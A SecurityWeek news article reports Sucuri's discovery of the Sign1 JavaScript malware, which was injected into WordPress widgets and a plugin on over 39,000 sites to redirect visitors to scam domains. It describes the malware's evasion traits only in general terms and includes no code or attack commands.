Now on Demand: Threat Detection and Incident Response (TDIR) Summit - All Sessions Available
Connect with us

Hi, what are you looking for?


Malware & Threats

39,000 Websites Infected in ‘Sign1’ Malware Campaign

Over 39,000 websites have been infected with the Sign1 malware that redirects visitors to scam domains.

More than 39,000 websites have been infected with a new malware family that redirects visitors to scam domains and displays unwanted ads, website security firm Sucuri warns.

Dubbed Sign1, the JavaScript malware was found inside WordPress custom HTML widgets or within the Simple Custom CSS and JS WordPress plugin that the attackers added to the compromised websites.

“Using this method, hackers infect websites without placing any malicious code into server files which allows the malware to stay unnoticed for a long time — as it’s much more common for security providers to scan website files for malware than to check in the database,” Sucuri says.

The injected code is responsible for changing every 10 minutes the URL to be executed in the victim’s browser, leading to unwanted redirects to VexTrio domains.

The malware, however, uses obfuscation to hide its presence and would only execute if the visitor comes from a major website, such as Facebook, Google, Instagram, or Yahoo.

“This is a common trait of malware as it tends to allow the infection to stay unnoticed for a longer time (normally a website owner will navigate to their website directly, rather than through a search engine),” Sucuri notes.

The security firm also discovered that the JavaScript code sets a specific cookie so that it would not detonate and display the unwanted pop-up multiple times for the same visitor.

Furthermore, the execution is conditioned by the existence of a hexadecimal-string JavaScript file that matches a specific 10-minute interval.

Advertisement. Scroll to continue reading.

“If these conditions are met, then the malware is injected and executes yet another script passing the URL of the current page, the referrer, and the browser language as a base64-encoded parameter. This script works as a TDS and redirects users further to malicious sites (usually the VexTrio scam sites),” Sucuri says.

Over the past six months, the security firm identified over 39,000 sites infected with different variants of the malware, with the most recent of them infecting more than 2,500 sites in the past two months.

Sucuri identified 15 domains used in this malicious campaign. Eight of them have been used in thousands of infections each.

Related: New Attack Shows Risks of Browsers Giving Websites Access to GPU

Related: Websites Hacked via Vulnerability in Bricks Builder WordPress Plugin

Related: Millions of User Records Stolen From 65 Websites via SQL Injection Attacks

Written By

Ionut Arghire is an international correspondent for SecurityWeek.


Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.


SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.


People on the Move

Wendy Zheng named as CFO and Joe Diamond as CMO at cyber asset management firm Axonius.

Intelligent document processing company ABBYY has hired Clayton C. Peddy as CISO.

Digital executive protection services provider BlackCloak has appointed Ryan Black as CISO.

More People On The Move

Expert Insights